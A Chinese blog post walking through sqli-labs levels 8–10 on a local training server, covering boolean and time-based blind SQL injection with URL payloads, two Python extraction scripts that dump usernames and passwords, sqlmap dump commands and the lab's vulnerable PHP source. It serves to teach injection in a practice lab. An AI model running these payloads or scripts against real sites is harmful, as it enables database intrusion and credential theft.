<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Sqlilabs通关笔记(8-10)盲注"><meta name="keywords" content="SQL注入"><meta name="author" content="bb,shuiyue75381@gmail.com"><meta name="copyright" content="bb"><title>Sqlilabs通关笔记(8-10)盲注【bb的博客】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!--link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!--link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!--script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"X7RY6NGU4G","apiKey":"bf7ed65264918bbc03f12b4cc1212d85","indexName":"myblog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
}</script></head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#第八关-基于GET单引号布尔型盲注"><span class="toc-number">1.</span> <span class="toc-text">第八关 基于GET单引号布尔型盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#存在注入点判断"><span class="toc-number">1.1.</span> <span class="toc-text">存在注入点判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQLMAP注入"><span class="toc-number">1.2.</span> <span class="toc-text">SQLMAP注入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第九关-基于GET单引号基于时间盲注"><span class="toc-number">2.</span> <span class="toc-text">第九关 基于GET单引号基于时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#存在注入点判断-1"><span class="toc-number">2.1.</span> <span class="toc-text">存在注入点判断</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第十关-基于GET双引号基于时间盲注"><span class="toc-number">3.</span> <span class="toc-text">第十关 基于GET双引号基于时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#存在注入点判断-2"><span class="toc-number">3.1.</span> <span class="toc-text">存在注入点判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQLMAP注入-1"><span class="toc-number">3.2.</span> <span class="toc-text">SQLMAP注入</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">bb</div><div class="author-info-description">This is myblog!</div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/bbkali" target="_blank">GitHub<i class="icon-dot bg-color3"></i></a><a class="links-button button-hover" href="mailto:shuiyue75381@gmail.com" target="_blank">E-Mail<i class="icon-dot bg-color0"></i></a><a class="links-button button-hover" href="tencent://message/?uin=1019593584&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color2"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">86</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">66</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">33</span></a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">bb的博客</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">Sqlilabs通关笔记(8-10)盲注</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2020-01-04 | 更新于 2020-02-06</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/SQL注入/">SQL注入</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/SQL注入/">SQL注入</a></div></div></div><div class="main-content"><h2 id="第八关-基于GET单引号布尔型盲注"><a href="#第八关-基于GET单引号布尔型盲注" class="headerlink" title="第八关 基于GET单引号布尔型盲注"></a>第八关 基于GET单引号布尔型盲注</h2><p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-10-58" alt="2020-1-5-9-10-58"></p>
<a id="more"></a>
<h3 id="存在注入点判断"><a href="#存在注入点判断" class="headerlink" title="存在注入点判断"></a>存在注入点判断</h3><ol>
<li>通过反斜杠可知，错误和正常页面有区别</li>
<li><p>可以构造payload来进行判断布尔值，从而确定要查询的结果</p>
<blockquote>
<p><a href="http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&#39;</a> and ‘s’=left(database(),1)–+ 页面正常 说明第一个字母为s<br><a href="http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&#39;</a> and ‘se’=left(database(),2)–+ 页面正常 第二个字母e<br> ……………….<br> 以此类推可以将数据结果得出</p>
</blockquote>
</li>
<li><p>利用二分法构造payload</p>
<ul>
<li><p>常用构造函数</p>
<ul>
<li><p>ascii() 函数，返回字符ascii码值 </p>
<ul>
<li>参数 : str单字符</li>
</ul>
</li>
<li><p>length() 函数，返回字符串的长度 </p>
<ul>
<li>参数 : str 字符串</li>
</ul>
</li>
<li><p>left() 函数，返回从左至右截取固定长度的字符串</p>
<ul>
<li>参数str,length</li>
<li>str : 字符串</li>
<li>length：截取长度</li>
</ul>
</li>
<li><p>substr()/substring() 函数 ， 返回从pos位置开始到length长度的子字符串</p>
<ul>
<li>参数，str，pos，length</li>
<li>str: 字符串</li>
<li>pos：开始位置</li>
<li>length： 截取长度</li>
</ul>
</li>
<li><p>if函数，判断条件并作出不同行动</p>
<ul>
<li>参数，条件，成立，不成立</li>
</ul>
</li>
</ul>
</li>
<li><p>实例构造</p>
<blockquote>
<p>SELECT <em> from users WHERE id = 1 and (length(database())=8)<br>SELECT </em> from users WHERE id = 1 and ascii(substr(database(),8,1))<br>SELECT <em> from users WHERE id = 1 and ‘s’=left(database(),1)<br>SELECT </em> from users WHERE id = 1 and if((length(database())=8),1,0)</p>
</blockquote>
</li>
<li><p>脚本编写</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line">arlist = string.printable</span><br><span class="line"></span><br><span class="line">Baseurl = <span class="string">"http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1\' and "</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">checkurl</span><span class="params">(url)</span>:</span></span><br><span class="line">    res = requests.get(url)</span><br><span class="line">    <span class="keyword">if</span> res.ok:</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    flag  = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> g <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> arlist:</span><br><span class="line">            payload = <span class="string">"substr((select group_concat(username,password) from users),%s,1) = \'%s\'--+"</span> % (</span><br><span class="line">                g, i)</span><br><span class="line">            finalurl = Baseurl + payload</span><br><span class="line">            <span class="keyword">if</span> checkurl(finalurl):</span><br><span class="line">                flag = flag + str(i)</span><br><span class="line">                print(flag)</span><br><span class="line">            sleep(<span class="number">0.2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>  __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ol>
<h3 id="SQLMAP注入"><a href="#SQLMAP注入" class="headerlink" title="SQLMAP注入"></a>SQLMAP注入</h3><p>直接上<strong>payload</strong></p>
<blockquote>
<p>sqlmap -u “<a href="http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1&quot;</a> –technique B -D security -T users -C username,password –dump –threads 10 –batch</p>
</blockquote>
<h2 id="第九关-基于GET单引号基于时间盲注"><a href="#第九关-基于GET单引号基于时间盲注" class="headerlink" title="第九关 基于GET单引号基于时间盲注"></a>第九关 基于GET单引号基于时间盲注</h2><p><img src="https://raw.githubusercontent.com/bbkali/picbad/master/2020-1-5-9-11-26" alt="2020-1-5-9-11-26"></p>
<h3 id="存在注入点判断-1"><a href="#存在注入点判断-1" class="headerlink" title="存在注入点判断"></a>存在注入点判断</h3><ol>
<li>加上反斜杠发现页面并无变化</li>
<li>猜测不管语法对错页面都没有变化</li>
<li>尝试使用sleep看是否执行</li>
<li>布尔盲注和时间盲注的最直观区别就是一个可以通过页面区别来判断对错，一个则无法判断对错，只能通过执行的时间来区别对错</li>
<li>查看源码验证布尔盲注和时间盲注<br>布尔源码如下：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	if($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;	</span><br><span class="line">  	echo &apos;You are in...........&apos;;</span><br><span class="line">  	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    	echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">  	&#125;</span><br><span class="line">	else </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;</span><br><span class="line">	//echo &apos;You are in...........&apos;;</span><br><span class="line">	//print_r(mysql_error());</span><br><span class="line">	//echo &quot;You have an error in your SQL syntax&quot;;</span><br><span class="line">	echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;	</span><br><span class="line">	echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">	else &#123; echo &quot;Please input the ID as parameter with numeric value&quot;;&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>时间盲注源码如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	if($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;	</span><br><span class="line">  	echo &apos;You are in...........&apos;;</span><br><span class="line">  	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    	echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">  	&#125;</span><br><span class="line">	else </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;</span><br><span class="line">	echo &apos;You are in...........&apos;;</span><br><span class="line">	//print_r(mysql_error());</span><br><span class="line">	//echo &quot;You have an error in your SQL syntax&quot;;</span><br><span class="line">	echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;	</span><br><span class="line">	echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">	else &#123; echo &quot;Please input the ID as parameter with numeric value&quot;;&#125;</span><br></pre></td></tr></table></figure></p>
<ol start="6">
<li><p>布尔注释掉了输出错误信息，而时间盲注不管对错页面都是You are in..</p>
</li>
<li><p>尝试构造payload</p>
<blockquote>
<p> <a href="http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1&#39;</a> and if((length(database())=8),sleep(5),1)–+</p>
</blockquote>
</li>
<li><p>脚本编写</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line">arlist = string.printable</span><br><span class="line"></span><br><span class="line">Baseurl = <span class="string">"http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1\' and "</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">checkurl</span><span class="params">(url)</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        res = requests.get(url,timeout = <span class="number">3</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    flag  = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> g <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> arlist:</span><br><span class="line">            payload = <span class="string">"if((substr((select group_concat(username,password) from users),%s,1) = \'%s\'),sleep(5),1)--+"</span> % (</span><br><span class="line">                g, i)</span><br><span class="line">            finalurl = Baseurl + payload</span><br><span class="line">            <span class="keyword">if</span> checkurl(finalurl):</span><br><span class="line">                flag = flag + str(i)</span><br><span class="line">                print(flag)</span><br><span class="line">            sleep(<span class="number">0.2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>  __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h2 id="第十关-基于GET双引号基于时间盲注"><a href="#第十关-基于GET双引号基于时间盲注" class="headerlink" title="第十关 基于GET双引号基于时间盲注"></a>第十关 基于GET双引号基于时间盲注</h2><h3 id="存在注入点判断-2"><a href="#存在注入点判断-2" class="headerlink" title="存在注入点判断"></a>存在注入点判断</h3><ul>
<li>和第九关类似，只不过需要用双引号闭合</li>
</ul>
<p>payload:</p>
<blockquote>
<p><a href="http://127.0.0.1/sqlilabs2/Less-10/index.php?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-10/index.php?id=1&quot;</a> and if((length(database())=8),sleep(5),1)–+</p>
</blockquote>
<h3 id="SQLMAP注入-1"><a href="#SQLMAP注入-1" class="headerlink" title="SQLMAP注入"></a>SQLMAP注入</h3><p><strong>直接上payload（9-10通用）</strong></p>
<blockquote>
<p>sqlmap -u “<a href="http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1&quot;</a> –technique T -D security -T users -C username,password –dump –threads 10 –batch</p>
</blockquote>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:shuiyue75381@gmail.com">bb</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="http://bbkali.github.io/2020/01/04/Sqlilabs通关笔记(8-10)盲注/">http://bbkali.github.io/2020/01/04/Sqlilabs通关笔记(8-10)盲注/</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://bbkali.github.io">bb的博客</a>！</span></div></div></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2020/01/06/Sqlilabs通关笔记(11-16)POST基本注入/"><i class="fas fa-angle-left">&nbsp;</i><span>Sqlilabs通关笔记(11-16)POST基本注入</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2020/01/04/Sqlilabs通关笔记(7)读写注入/"><span>Sqlilabs通关笔记(7)读写注入</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fas fa-file-o"></i></span><span id="busuanzi_value_page_pv"></span><span></span></div><div class="copyright">&copy;2019 ～ 2020 By bb</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>